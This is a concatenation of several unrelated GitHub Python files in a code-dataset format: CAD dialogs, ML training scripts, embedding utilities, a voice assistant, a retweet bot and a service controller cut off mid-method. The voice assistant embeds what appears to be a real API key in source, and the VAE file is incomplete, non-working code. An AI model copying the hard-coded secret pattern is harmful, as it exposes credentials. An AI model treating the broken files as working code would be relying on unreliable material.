self.labelName = QLabel(\"\")\n\n self.buttonCE.clicked.connect(self.setCocoTable)\n\n self.formLayout.setWidget(0, QFormLayout.LabelRole, self.buttonCE)\n self.formLayout.setWidget(0, QFormLayout.FieldRole, self.labelName)\n self.verticalLayout.addLayout(self.formLayout)\n\n # Actions.\n self.horizontalLayout = QHBoxLayout()\n self.buttonCcde = QPushButton(\"COCO Description\")\n self.buttonAddRow = QPushButton(\"Add Row\")\n self.buttonDelRow = QPushButton(\"Delete Row\")\n self.buttonAddColumn = QPushButton(\"Add Column\")\n self.buttonDelColumn = QPushButton(\"Delete Column\")\n\n self.buttonCcde.clicked.connect(self.setupTypes)\n self.buttonAddRow.clicked.connect(self.addRow)\n self.buttonDelRow.clicked.connect(self.deleteRow)\n self.buttonAddColumn.clicked.connect(self.addColumn)\n self.buttonDelColumn.clicked.connect(self.deleteColumn)\n\n 
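# Worked example of the table this dialog edits (hypothetical values):\n        # a row ['FL', 'FL', 'PL'] makes accept() create the COCO items FL-FL\n        # and FL-PL, i.e. column 0 holds a CType and every later cell on the\n        # row one compatible connection type.\n        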
self.horizontalLayout.addWidget(self.buttonCcde)\n self.horizontalLayout.addWidget(self.buttonAddRow)\n self.horizontalLayout.addWidget(self.buttonDelRow)\n self.horizontalLayout.addWidget(self.buttonAddColumn)\n self.horizontalLayout.addWidget(self.buttonDelColumn)\n\n self.verticalLayout.addLayout(self.horizontalLayout)\n\n # COCO Table.\n self.tableWidget = QTableWidget(3, 4)\n self.tableWidget.setHorizontalHeaderLabels([\"CType\"])\n self.tableWidget.setAlternatingRowColors(True)\n self.tableWidget.horizontalHeader().setDefaultSectionSize(60)\n self.tableWidget.verticalHeader().setDefaultSectionSize(18)\n #self.tableWidget.horizontalHeader().setStretchLastSection(True)\n\n # Delegate.\n self.comboBoxDelegate = ComboBoxDelegate(self.tableWidget)\n self.tableWidget.setItemDelegate(self.comboBoxDelegate)\n\n self.verticalLayout.addWidget(self.tableWidget)\n\n # Dialog Buttons.\n self.buttonBox = QDialogButtonBox()\n self.buttonBox.setStandardButtons(QDialogButtonBox.Cancel|QDialogButtonBox.Ok)\n\n self.buttonBox.accepted.connect(self.accept)\n self.buttonBox.rejected.connect(self.reject)\n\n self.verticalLayout.addWidget(self.buttonBox)\n # setupUi\n\n def setCocoTable(self):\n aItem = PipeCad.CurrentItem()\n if aItem.Type == \"CCTA\":\n self.cocoTable = aItem\n self.labelName.setText(aItem.Name)\n self.comboBoxDelegate.setupCoco(aItem)\n else:\n QMessageBox.warning(self, \"\", \"Please select CCTA!\")\n # if\n # setCocoTable\n\n def setupTypes(self):\n aDlg = CocdesDialog(self)\n aDlg.fillForm(self.cocoTable)\n if aDlg.exec() == QDialog.Rejected:\n return\n # if\n\n if self.cocoTable is None:\n QMessageBox.warning(self, \"\", \"Please set CCTA first!\")\n return\n # if\n\n aMemberList = self.cocoTable.Member\n if len(aMemberList) > 0:\n PipeCad.SetCurrentItem(aMemberList[-1])\n else:\n PipeCad.SetCurrentItem(self.cocoTable)\n # if\n\n PipeCad.StartTransaction(\"Set COCO Description\")\n aRowCount = aDlg.tableWidget.rowCount\n for r in range (aRowCount):\n aNameItem = aDlg.tableWidget.item(r, 0)\n aDescItem = aDlg.tableWidget.item(r, 1)\n if aNameItem is not None and len(aNameItem.text()) > 0:\n try:\n PipeCad.CreateItem(\"CCDE\", aNameItem.text() + \"-DESC\")\n except Exception as e:\n PipeCad.SetCurrentItem(\"/\" + aNameItem.text() + \"-DESC\")\n # try\n\n aCcdeItem = PipeCad.CurrentItem()\n aCcdeItem.Connection = aNameItem.text()\n aCcdeItem.Description = aDescItem.text()\n # if\n # for\n PipeCad.CommitTransaction()\n\n self.comboBoxDelegate.setupCoco(self.cocoTable)\n # setupTypes\n\n def addRow(self):\n aRow = self.tableWidget.rowCount\n self.tableWidget.insertRow(aRow)\n # addRow\n\n def deleteRow(self):\n aRow = self.tableWidget.currentRow()\n self.tableWidget.removeRow(aRow)\n # deleteRow\n\n def addColumn(self):\n aColumn = self.tableWidget.columnCount\n self.tableWidget.insertColumn(aColumn)\n # addColumn\n\n def deleteColumn(self):\n aColumn = self.tableWidget.currentColumn()\n self.tableWidget.removeColumn(aColumn)\n # deleteColumn\n\n def accept(self):\n if self.cocoTable is None:\n return\n # if\n\n aRowCount = self.tableWidget.rowCount\n aColumnCount = self.tableWidget.columnCount\n if aRowCount < 1:\n return\n # if\n\n aMemberList = self.cocoTable.Member\n if len(aMemberList) > 0:\n PipeCad.SetCurrentItem(aMemberList[-1])\n else:\n PipeCad.SetCurrentItem(self.cocoTable)\n # if\n\n PipeCad.StartTransaction(\"Modify COCO Table\")\n for r in range(aRowCount):\n aTypeItem = self.tableWidget.item(r, 0)\n if aTypeItem is not None and len(aTypeItem.text()) > 0:\n for c in 
range(1, aColumnCount):\n aConnItem = self.tableWidget.item(r, c)\n if aConnItem is not None and len(aConnItem.text()) > 0:\n try:\n PipeCad.CreateItem(\"COCO\", aTypeItem.text() + \"-\" + aConnItem.text())\n aCocoItem = PipeCad.CurrentItem()\n aCocoItem.Ctype1 = aTypeItem.text()\n aCocoItem.Ctype2 = aConnItem.text()\n except Exception as e:\n pass\n # try\n # if\n\n # for\n # if\n # for\n\n PipeCad.CommitTransaction()\n\n QDialog.accept(self)\n # accept\n# ModifyDialog\n\n# Singleton Instance.\naModifyDlg = ModifyDialog(PipeCad)\n\ndef Modify():\n aModifyDlg.setCocoTable()\n aModifyDlg.show()\n# Create\n","repo_name":"eryar/PipeCAD","sub_path":"lib/pipecad/CocoTable.py","file_name":"CocoTable.py","file_ext":"py","file_size_in_byte":12670,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"21"} +{"seq_id":"2986129046","text":"from pymongo import MongoClient\nimport numpy as np\nimport pandas as pd\nimport os\nfrom my_tools import get_bill_data, process_corpus, read_jsonl_file\nimport matplotlib.pyplot as plt\nplt.style.use('ggplot')\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import recall_score, precision_score, accuracy_score, f1_score, confusion_matrix\n\nfrom sklearn.externals import joblib\n\n\n# get bill data\nprint('-------------------')\nprint('Loading original and preprocessed data for vectorizing and modeling...')\ndata, in_progress = get_bill_data()\n\n\ncorpus_with_labels = read_jsonl_file('/home/ubuntu/galvanize_capstone/data/nlp/corpus_with_labels.jsonl')\ncorpus_df = pd.DataFrame(list(corpus_with_labels))\n\nX = corpus_df['document']\ny = corpus_df['label'].astype(int)\n\n\n\n# create stratified train-test split\nprint('-------------------')\nprint('Doing train-test split...')\nX_train, X_test, y_train, y_test = train_test_split(X, y, stratify = y)#, random_state = 123)\n\n\n# Already vectorized using pickle_nlp_boosting_model.py\n# vectorizing ~30M dimensions with n-grams, l1 norm (simple avg), or l2 (avg**2)\n# use_idf=True gives more weight to words, n_grams that appear less frequently in the corpus\n# sublinear_tf=True reduces the bias of length\nprint('-------------------')\nprint('Vectorizing...')\ntfvect = TfidfVectorizer(ngram_range = (1, 4), \n max_features = 6000000,\n norm = 'l2', #default value\n use_idf = True, #default value\n sublinear_tf = True)\n\n\n\n# # load the TfidfVectorizer if needed\n# print('-------------------')\n# print('Loading the pickled TfidfVectorizer...')\n# pickle_path = 'pickle_files/tfidfVectorizer.pkl'\n# tfvect = joblib.load(pickle_path)\n# print('Pickled vectorizer loaded.')\n\n\n# print('-------------------')\n# print('Vectorizing bill text...')\nX_train_vec = tfvect.fit_transform(X_train)\n# X_train_vec = tfvect.transform(X_train) # for pickled model\nX_test_vec = tfvect.transform(X_test)\n\n\nprint('-------------------')\nprint('Getting Features...')\nfeatures = tfvect.get_feature_names()\n\n\n# dump the TfidfVectorizer\nprint('-------------------')\nprint('Pickling the TfidfVectorizer...')\npickle_path = 'pickle_files/tfidfVectorizer.pkl'\nif os.path.exists(pickle_path):\n os.remove(pickle_path)\njoblib.dump(tfvect, pickle_path)\nprint('Pickling complete.')\n\n\nprint('-------------------')\nprint('Training Random Forest Classifier with vectorized results...')\nrf = RandomForestClassifier(n_estimators = 100, \n max_features = 3000000,\n 
max_depth = 3,\n                            min_samples_split = 2,\n                            min_samples_leaf = 1,\n                            class_weight = 'balanced',\n                            n_jobs = -1)\nrf.fit(X_train_vec, y_train)\n\nrf_y_pred = rf.predict(X_test_vec)\nrf_y_pred_proba = rf.predict_proba(X_test_vec)\n\nprint('F1 Score:\\t\\t{:.4f}'.format(f1_score(y_test, rf_y_pred)))\nprint('Recall Score:\\t\\t{:.4f}'.format(recall_score(y_test, rf_y_pred)))\nprint('Precision Score:\\t{:.4f}'.format(precision_score(y_test, rf_y_pred)))\nprint('Accuracy Score:\\t\\t{:.4f}'.format(accuracy_score(y_test, rf_y_pred)))\nprint('Confusion Matrix')\nprint(confusion_matrix(y_test, rf_y_pred))\n\n\n# dump the RandomForest Classifier\nprint('Pickling the Random Forest Classifier...')\npickle_path = 'pickle_files/nlp_randomForest.pkl'\nif os.path.exists(pickle_path):\n    os.remove(pickle_path)\njoblib.dump(rf, pickle_path)\nprint('All Pickling Complete. DATA SCIENCE!!!')","repo_name":"magdiel85281/galvanize_capstone","sub_path":"src/pickle_nlp_rf_model.py","file_name":"pickle_nlp_rf_model.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"25084325801","text":"import argparse\nimport numpy as np\nimport sys, os\nfrom math import floor\nfrom collections import OrderedDict as odict\nfrom contextlib import contextmanager\nimport struct as st\nimport functools\nimport re\nfrom tqdm import tqdm\n\n#@contextmanager\ndef open_w2v(filename):\n    if os.path.isdir(filename):\n        print('path of a directory given, using vectors.bin inside it')\n        filename = os.path.join(filename, 'vectors.bin')\n    if not os.path.isfile(filename):\n        raise ValueError(f'file {filename} not found!!')\n\n    with open(filename, 'rb') as mfobj:\n        m = mfobj.read()\n\n    # get length of first line\n    length1st = 0\n    while m[length1st] != ord('\\n') and length1st < 100:\n        length1st += 1\n    if length1st == 100:\n        raise ValueError('First line length could not be found')\n\n    #print(m[0].decode('utf8'))\n    #s = st.Struct('ii')\n    #m_it = m.__iter__()\n    head_dims = st.unpack(f'<{length1st}s', m[:length1st])\n    n_vocab, n_dim = map(int, head_dims[0].strip().split())\n    print(f\"Vocabulary size: {n_vocab} and dimension of embed: {n_dim}\")\n    embed = {}\n    #[next(m_it) for _ in range(11)]\n    cnt = 11\n    for line_cnt in range(n_vocab):\n        word = ''\n        while True:\n            next_char = st.unpack('<1s', m[cnt:cnt+1])[0].decode('utf8')\n            cnt += 1\n            if next_char == ' ':\n                break\n            else:\n                word += next_char\n        #print(word)\n        vec = np.zeros(n_dim)\n        for k in range(n_dim):\n            vec[k] = st.unpack('<f', m[cnt:cnt+4])[0]\n            cnt += 4\n        cnt += 1  # skip the newline byte that ends each vector\n        embed[word] = vec\n    return embed\n\n\ndef open_text_vecs(filename):\n    # The span between the '<f' format string above and the '<unk>' literal\n    # below was lost when angle-bracket runs were stripped from this file;\n    # this text-format reader is an editor's reconstruction from the\n    # surviving fragments ('vals' and the '<unk>' message), and its name and\n    # exact control flow are assumptions.\n    embed = {}\n    with open(filename, 'r') as f:\n        for line in f:\n            vals = line.rstrip().split(' ')\n            if vals[0] == '<unk>':\n                print('<unk> was referenced and defined')\n            embed[vals[0]] = np.array([float(x) for x in vals[1:]])\n    return embed\n\n\ndef generate(vect_dict):\n    '''\n    get a sample of approximately N words out of the vector file\n    '''\n\n    # don't need the vocabulary\n    #with open(args.vocab_file, 'r') as f:\n    #    words = [x.rstrip().split(' ')[0] for x in f.readlines()]\n    lengths = {}\n    for v in vect_dict:\n        sumv = np.sum(np.abs(vect_dict[v]))\n        probs = vect_dict[v]/sumv\n\n        lengths[v] = np.sqrt(np.sum([float(x)**2 for x in probs]))\n\n    return odict(sorted(lengths.items(), key=lambda t: t[1]))\n\ndef nearest(word_vec, unit_embed, n_near=10):\n    '''\n    Returns the `n_near` closest vectors to the `word_vec` vector\n    NOTE that `unit_embed` needs to be unitary vectors\n    '''\n    dist_dict = {}\n    if isinstance(word_vec, str):\n        word_vec = unit_embed[word_vec]\n    unit_word_vec = word_vec/np.linalg.norm(word_vec)\n    for w, v in unit_embed.items():\n        #dist_dict[w] = cos_dist(v, word_vec)\n        dist_dict[w] = unit_word_vec.dot(v)\n    return sorted(dist_dict.items(), key=lambda pair: pair[1], reverse=True)[:n_near]
\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument('words', nargs='+')\n    parser.add_argument('--out_file', default='vocab.txt', type=str,\n            help='file to write the sorted lengths of the vectors')\n    parser.add_argument('--vectors_file', default='vectors.txt', type=str)\n    #parser.add_argument('--skip_n', default=1, type=int)\n    args = parser.parse_args()\n    with open(args.vectors_file, 'r') as f:\n        vec_dict = {}\n        for index, line in enumerate(f):\n            vals = line.rstrip().split(' ')\n            if vals[0] in args.words:\n                vec_dict[vals[0]] = np.array([float(k) for k in vals[1:]])\n\n    sorted_dict = generate(vec_dict)\n    with open(args.out_file, 'a') as out_f:\n        for o in sorted_dict:\n            out_f.write(\"{:<15} {}\\n\".format(o, sorted_dict[o]))\n\n\n","repo_name":"lab156/arxivDownload","sub_path":"embed/embed_utils.py","file_name":"embed_utils.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"}
{"seq_id":"36046624387","text":"import numpy as np\nimport argparse\nimport chainer\nfrom chainer import cuda, Function, gradient_check, report, training, utils, Variable\nfrom chainer import datasets, iterators, optimizers, serializers\nfrom chainer import Link, Chain, ChainList\nimport chainer.functions as F\nimport chainer.links as L\nfrom chainer.training import extensions\nfrom net.cbr import CBR  # assumed export; CBR is used unqualified below\n\nclass Encoder(Chain):\n    def __init__(self, in_ch, dim_z):\n        # w = chainer.initializers.Normal(0.02)  # unused initializer; Chain.__init__ accepts links only\n        super().__init__(\n            e1 = CBR(in_ch, 32, bn=True, sample='down', activation=F.leaky_relu, dropout=False),\n            e2 = CBR(32, 64, bn=True, sample='down', activation=F.leaky_relu, dropout=False),\n            e3 = CBR(64, 256, bn=True, sample='down', activation=F.leaky_relu, dropout=False),\n            e4 = CBR(256, 512, bn=True, sample='down', activation=F.leaky_relu, dropout=False),\n            e5_mu = L.Convolution2D(512, 512, 4, stride=4),\n            e5_sigma = L.Convolution2D(512, 512, 4, stride=4),\n            out_mu = L.Linear(512, dim_z),\n            out_sigma = L.Linear(512, dim_z)\n        )\n    def __call__(self, x):\n        h = x\n        h = F.max_pooling_2d(self.e1(h, test=False), 2)\n        h = F.max_pooling_2d(self.e2(h, test=False), 2)\n        h = F.max_pooling_2d(self.e3(h, test=False), 2)\n        h = F.average_pooling_2d(self.e4(h, test=False), 2)\n        mu = self.out_mu(F.sigmoid(self.e5_mu(h)))\n        sigma = self.out_sigma(F.sigmoid(self.e5_sigma(h)))\n        return mu, sigma\n\nclass Decoder(Chain):\n    def __init__(self, dim_z):\n        super().__init__(\n            lin=L.Linear(dim_z, 32 * 4 * 4),\n            norm0=L.BatchNormalization(32),\n            d1 = CBR(32, 512, bn=True, sample='up', activation=F.leaky_relu, dropout=False, ksize=4, stride=2, padding=1),\n            d2 = CBR(64, 256, bn=True, sample='up', activation=F.leaky_relu, dropout=False, ksize=4, stride=2, padding=1),\n            d3 = CBR(32, 64, bn=True, sample='up', activation=F.leaky_relu, dropout=False, ksize=4, stride=2, padding=1),\n            d_r = L.Deconvolution2D(512, 256, 4, stride=2, pad=1),\n            d_g = L.Deconvolution2D(512, 256, 4, stride=2, pad=1),\n            d_b = L.Deconvolution2D(512, 256, 4, stride=2, pad=1)\n        )\n\n    def __call__(self, z):\n        h = F.reshape(self.lin(z), (z.data.shape[0], 32, 4, 4))\n        h = self.norm0(h)\n        h = self.d1(h, test=False)\n        h = self.d2(h, test=False)\n        h = self.d3(h, test=False)\n        r = self.d_r(h)\n        g = self.d_g(h)\n        b = self.d_b(h)\n        return r, g, b\n\nclass VAE(Chain):\n    def __init__(self, k=512):\n        self.k = k\n        super().__init__(\n            enc = Encoder(3, k),  # in_ch=3 (RGB input) assumed\n            dec = Decoder(k)\n        )\n\n    def __call__(self, x, test=False, k=4):
\n        batch_size = x.data.shape[0]\n        w = x.data.shape[2]\n        tr, tg, tb = chainer.functions.split_axis(x, 3, 1)\n        tr = F.reshape(tr, (batch_size * w * w, ))\n        tg = F.reshape(tg, (batch_size * w * w, ))\n        tb = F.reshape(tb, (batch_size * w * w, ))\n\n        x = chainer.Variable(x.data.astype('f'))\n\n        z_mu, z_var = self.enc(x)\n        loss_kl = F.gaussian_kl_divergence(z_mu, z_var) / batch_size / self.k  # log of var?\n\n\nexit()\nparser = argparse.ArgumentParser(description='Chainer example: MNIST')\nparser.add_argument('--gpu', '-g', type=int, default=-1,\n                    help='GPU ID (negative value indicates CPU)')\nargs = parser.parse_args()\n\ntrain_data = FontImageDataset(10000, train=True, flatten=False)\ntest_data = FontImageDataset(10000, train=False, flatten=False)\ntrain_iter = iterators.SerialIterator(train_data, batch_size=200, shuffle=True)\ntest_iter = iterators.SerialIterator(test_data, batch_size=200, repeat=False, shuffle=False)\n\nmodel = L.Classifier(CNN())\n\nif args.gpu >= 0:\n    chainer.cuda.get_device(args.gpu).use()  # Make a specified GPU current\n    model.to_gpu()  # Copy the model to the GPU\n\noptimizer = optimizers.SGD()\noptimizer.setup(model)\n\n#updater = training.StandardUpdater(train_iter, optimizer, device=-1)\nupdater = training.StandardUpdater(train_iter, optimizer, device=args.gpu)\n\ntrainer = training.Trainer(updater, (500, 'epoch'), out='result')\nprint(\"start running\")\n#trainer.extend(extensions.Evaluator(test_iter, model))\ntrainer.extend(extensions.Evaluator(test_iter, model, device=args.gpu))\ntrainer.extend(extensions.LogReport())\ntrainer.extend(extensions.PrintReport(['epoch', 'main/accuracy', 'validation/main/accuracy']))\n#trainer.extend(extensions.PrintReport(['epoch', 'main/accuracy']))\ntrainer.extend(extensions.ProgressBar())\ntrainer.run()\nprint(\"end running\")\n","repo_name":"mizti/vae_test","sub_path":"vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":4652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"36694615971","text":"\"\"\"\r\nImplementation in Tensorflow of the BLSTM model described in:\r\nN. Gkalelis, V. Mezaris, \"Structured Pruning of LSTMs via\r\nEigenanalysis and Geometric Median for Mobile Multimedia\r\nand Deep Learning Applications\", Proc. 22nd IEEE Int.\r\nSymposium on Multimedia (ISM), Dec. 2020.
\r\nHistory\r\n-------\r\nDATE | DESCRIPTION | NAME | Organization |\r\n1/07/2020 | first creation | Nikolaos Gkalelis | CERTH-ITI |\r\n\"\"\"\r\n\r\nfrom __future__ import absolute_import, division, print_function, unicode_literals\r\n\r\nimport tensorflow as tf\r\n\r\nclass MyLstm(tf.keras.Model):\r\n    def __init__(self, num_classes,\r\n                 weight_decay = 0.005,\r\n                 sequence_length = 300,\r\n                 lstm_size = 1024,\r\n                 video_feature_size = 1024,\r\n                 audio_feature_size = 128):\r\n        super(MyLstm, self).__init__()\r\n\r\n        total_feature_size = video_feature_size + audio_feature_size\r\n        input_shape = (sequence_length, total_feature_size)\r\n        lstm_fw = tf.keras.layers.LSTM(int(lstm_size / 2), return_sequences=True)\r\n        lstm_bw = tf.keras.layers.LSTM(int(lstm_size / 2), return_sequences=True, go_backwards=True)\r\n        self.bdr = tf.keras.layers.Bidirectional(lstm_fw, backward_layer=lstm_bw, input_shape=input_shape)\r\n        self.lstm = tf.keras.layers.LSTM(int(lstm_size))\r\n        self.dns = tf.keras.layers.Dense(units=num_classes, activation='sigmoid',\r\n                                         kernel_regularizer=tf.keras.regularizers.l2(weight_decay))\r\n\r\n\r\n    def call(self, inputs):\r\n\r\n        x1 = self.bdr(inputs)\r\n        x2 = self.lstm(x1)\r\n        x = self.dns(x2)\r\n\r\n        return x, x1, x2\r\n","repo_name":"bmezaris/lstm_structured_pruning_geometric_median","sub_path":"model/mymodels.py","file_name":"mymodels.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
{"seq_id":"4434021457","text":"import pyttsx3 #pip install pyttsx3\nimport speech_recognition as sr #pip install speechRecognition\nimport datetime\nimport wikipedia #pip install wikipedia\nimport webbrowser\nimport os\nimport smtplib\nimport time\nfrom bs4 import BeautifulSoup\nimport requests, json\nimport pyaudio\n\n\nengine = pyttsx3.init('sapi5')\nvoices = engine.getProperty('voices')\n# print(voices[1].id)\nengine.setProperty('voice', voices[0].id)\n\n\ndef speak(audio):\n    engine.say(audio)\n    engine.runAndWait()\n\n\ndef wishMe():\n    hour = int(datetime.datetime.now().hour)\n    strTime = time.strftime(\"%H:%M\")\n    if hour>=0 and hour<12:\n        speak(\"Good Morning! the time is\")\n        speak(strTime)\n\n    elif hour>=12 and hour<18:\n        speak(\"Good Afternoon! the time is\")\n        speak(strTime)\n\n    else:\n        speak(\"Good Evening! the time is\")\n        speak(strTime)\n\n    speak(\"Hello Sir. 
Please tell me how may I help you\") \n\ndef takeCommand():\n #It takes microphone input from the user and returns string output\n\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Listening...\")\n r.pause_threshold = 1\n audio = r.listen(source)\n\n try:\n print(\"Recognizing...\") \n query = r.recognize_google(audio, language='en-in')\n print(f\"User said: {query}\\n\")\n\n except Exception as e:\n # print(e) \n print(\"Say that again please...\") \n return \"None\"\n return query\n\n\n\nif True:\n wishMe()\n while True:\n # if 1:\n query = takeCommand().lower()\n\n # Logic for executing tasks based on query\n if 'wikipedia' in query:\n speak('Searching Wikipedia...')\n query = query.replace(\"wikipedia\", \"\")\n results = wikipedia.summary(query, sentences=2)\n speak(\"According to Wikipedia\")\n print(results)\n speak(results)\n\n elif 'weather' in query:\n api_key = \"7fb0aa01055b31bbbb4c0a84b382d0a5\" #generate your own api key from open weather\n base_url = \"http://api.openweathermap.org/data/2.5/weather?\"\n speak(\"tell me which city\")\n city_name = takeCommand()\n complete_url = base_url + \"appid=\" + api_key + \"&q=\" + city_name\n response = requests.get(complete_url)\n x = response.json()\n if x[\"cod\"] != \"404\":\n y = x[\"main\"]\n current_temperature = y[\"temp\"]\n current_pressure = y[\"pressure\"]\n current_humidiy = y[\"humidity\"]\n z = x[\"weather\"]\n weather_description = z[0][\"description\"]\n r = (\"in \" + city_name + \" Temperature is \" +\n str(int(current_temperature - 273.15)) + \" degree celsius \" +\n \", atmospheric pressure \" + str(current_pressure) + \" hpa unit\" +\n \", humidity is \" + str(current_humidiy) + \" percent\"\n \" and \" + str(weather_description))\n print(r)\n speak(r)\n \n \n elif (\"create a reminder list\" in query or \"reminder\" in query):\n speak(\"What is the reminder?\")\n data = takeCommand()\n speak(\"You said to remember that\" + data)\n reminder_file = open(\"data.txt\", 'a')\n reminder_file.write('\\n')\n reminder_file.write(data)\n reminder_file.close()\n \n elif (\"do you know anything\" in query or \"remember\" in query):\n reminder_file = open(\"data.txt\", 'r')\n speak(\"You said me to remember that: \" + reminder_file.read())\n \n elif 'currency' in query and 'conver' in query:\n speak('I can convert, US dollar into indian rupee, and indian rupee into US dollar. Do you want to continue it?')\n query = takeCommand().lower()\n if 'y' in query or 'sure' in query or 'of course' in query:\n speak('which conversion you want to do? 
US dollar to indian rupee, or indian rupee to US dollar?')\n                query = takeCommand().lower()\n                if ('dollar' in query or 'US' in query) and ('to india' in query or 'to rupee' in query):\n                    speak('Enter US Dollar')\n                    USD = float(input(\"Enter United States Dollar (USD):\"))\n                    INR = USD * 81.70\n                    inr = \"{:.4f}\".format(INR)\n                    print(f\"{USD} US Dollar is equal to {inr} indian rupee.\")\n                    speak(f'{USD} US Dollar is equal to {inr} indian rupee.')\n                    speak(\"If you again want to do currency conversion then say, 'convert currency'\")\n                elif ('india' in query or 'rupee' in query) and ('to US' in query or 'to dollar' in query or 'to US dollar' in query):\n                    speak('Enter Indian Rupee')\n                    INR = float(input(\"Enter Indian Rupee (INR):\"))\n                    USD = INR/81.70\n                    usd = \"{:.3f}\".format(USD)\n                    print(f\"{INR} indian rupee is equal to {usd} US Dollar.\")\n                    speak(f'{INR} indian rupee is equal to {usd} US Dollar.')\n                    speak(\"If you again want to do currency conversion then say, 'convert currency'\")\n                else:\n                    speak(\"I cannot understand what you said. If you want to convert currency, just say 'convert currency'.\")\n            else:\n                print('ok sir')\n\n\n","repo_name":"sailee2781/voice-assistant-visually-impaired","sub_path":"voice assistant.py","file_name":"voice assistant.py","file_ext":"py","file_size_in_byte":5542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"74741603572","text":"import tweepy\r\n\r\nconsumer_key = \"XXXXXXXXXXXXXXXXXXXXXX\"\r\nconsumer_secret = \"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\"\r\nkey = \"XXXXXXXXXXXXXXXXXXXXX-7S4aSCzUks64BQECoP33dQD45iXm9A\"\r\nsecret = \"XXXXXXXXXXXXXXXXXXXXXXXXXX\"\r\n\r\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\nauth.set_access_token(key, secret)\r\n\r\n\r\napi = tweepy.API(auth)\r\n\r\nhashtag = \"python\"\r\n\r\ntweetnum = 5\r\n\r\ntweets = tweepy.Cursor(api.search, hashtag).items(tweetnum)\r\n\r\nfor tweet in tweets:\r\n    tweet.retweet()\r\n","repo_name":"ya-nsh/twitterbot","sub_path":"twbot/searchbot.py","file_name":"searchbot.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"4722023623","text":"from django.contrib import admin\n\nfrom .models import Store\nfrom .models import Inventory\n\n\nclass StoreList(admin.ModelAdmin):\n    list_display = ('store_brand', 'store_addr', 'store_category')\n    list_filter = ('store_brand', 'store_category')\n    search_fields = ('store_brand',)\n    ordering = ['store_brand']\n\n\nclass InventoryList(admin.ModelAdmin):\n    list_display = ('inventory_name', 'inventory_amount')\n    list_filter = ('inventory_name', 'inventory_amount')\n    search_fields = ('inventory_name', 'store')\n    ordering = ['inventory_name', 'store']\n\n\nadmin.site.register(Store, StoreList)\nadmin.site.register(Inventory, InventoryList)\n","repo_name":"snavelycoreyt/Assignment1P1","sub_path":"inventorysystem/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"21436518845","text":"#!/root/vMU/vEnv/bin/python3\n\nimport subprocess, os, signal, time, socket, threading, json, psutil, yaml, numpy as np, src.Python_Code.muApi as muApi\nfrom multiprocessing import shared_memory\n\n\n# Service Directory\nmyDir = os.getcwd()\nworkDir = os.path.dirname(os.path.abspath(__file__))\nos.chdir(workDir)\n\nC_buildPath = os.path.join(workDir, 'src', 'C_Build')\nPython_buildPath = os.path.join(workDir, 
'src', 'Python_Code')\nPython_Executable = '/root/vMU/vEnv/bin/python3'\n\ntry:\n controllerShm = shared_memory.SharedMemory(name='controller', create=False, size=4)\nexcept:\n controllerShm = shared_memory.SharedMemory(name='controller', create=True, size=4)\ncontroller = np.ndarray((1,), dtype=np.uint32, buffer=controllerShm.buf)\n\ndef getIface():\n for d in psutil.net_if_stats().keys():\n if d != 'lo':\n return str(d)\n return None\n\ndef preload():\n import src.Python_Code.guestConf as guest\n guest.hostUpdate()\n res = subprocess.run(['make', '-f', 'Makefile', 'build'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)\n if res.returncode != 0:\n print(res.stderr)\n exit(0)\n else:\n print(res.stdout)\n\ndef cleanUp():\n controllerShm.unlink()\n \n res = subprocess.run(['make', '-f', 'Makefile', 'clean'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)\n if res.returncode != 0:\n print(res.stderr)\n exit(1)\n else:\n print(res.stdout)\n\nclass vMU_Brain:\n def __init__(self) -> None:\n self.tests = {}\n self.sniffer = {}\n self.api = {}\n self.runSniffer()\n time.sleep(0.5)\n self.runAPI()\n\n def send_signal_by_name(self, process_name, signal):\n for process in psutil.process_iter(['pid', 'name']):\n cmd = ' '.join(psutil.Process(process.info['pid']).cmdline())\n if cmd == process_name:\n process_pid = process.info['pid']\n try:\n psutil.Process(process_pid).send_signal(signal)\n except psutil.NoSuchProcess:\n print(f\"Process '{process_name}' not found.\")\n\n def runAPI(self):\n # put pid \n self.api['command'] = f'{Python_Executable} {Python_buildPath}/muApi.py {os.getpid()}'\n self.api['process'] = subprocess.Popen(self.api['command'], shell=True)\n self.api['running'] = True\n \n def stopAPI(self):\n if self.api['running']:\n self.send_signal_by_name(self.api['command'], psutil.signal.SIGTERM)\n self.api['running'] = False\n\n def API_Handler(self, signal1, signal2):\n if controller[0] == muApi.START_CONTINUOUS:\n self.runContinuous()\n controller[0] = muApi.NOTHING\n elif controller[0] == muApi.STOP_CONTINUOUS:\n self.stopContinuous()\n controller[0] = muApi.NOTHING\n elif controller[0] == muApi.UPDATE_CONTINUOUS:\n self.updateContinuous()\n controller[0] = muApi.NOTHING\n elif controller[0] == muApi.START_SEQUENCER:\n self.runSequencer()\n controller[0] = muApi.NOTHING\n elif controller[0] == muApi.STOP_SEQUENCER:\n self.stopSequencer()\n controller[0] = muApi.NOTHING\n elif controller[0] == muApi.RESTART_NETWORK:\n self.restartSniffer()\n controller[0] = muApi.NOTHING\n self.send_signal_by_name(self.api['command'], psutil.signal.SIGUSR2)\n\n def runSequencer(self):\n if 